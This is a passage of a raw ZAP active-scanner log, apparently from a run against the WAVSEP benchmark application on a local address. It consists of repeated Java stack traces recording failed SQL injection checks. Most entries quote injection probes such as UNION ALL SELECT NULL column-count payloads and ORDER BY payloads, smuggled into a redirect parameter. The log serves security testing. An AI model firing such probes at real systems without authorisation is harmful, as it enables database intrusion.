org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681769 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681770 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681770 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681771 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681772 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681772 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com') ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com') ORDER BY 1-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9681773 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681774 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com') ORDER BY 6145-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com') ORDER BY 6145-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9681775 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681776 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com') UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com') UNION ALL SELECT NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681776 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681778 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') ORDER BY 1-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9681778 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com') UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com') UNION ALL SELECT NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at 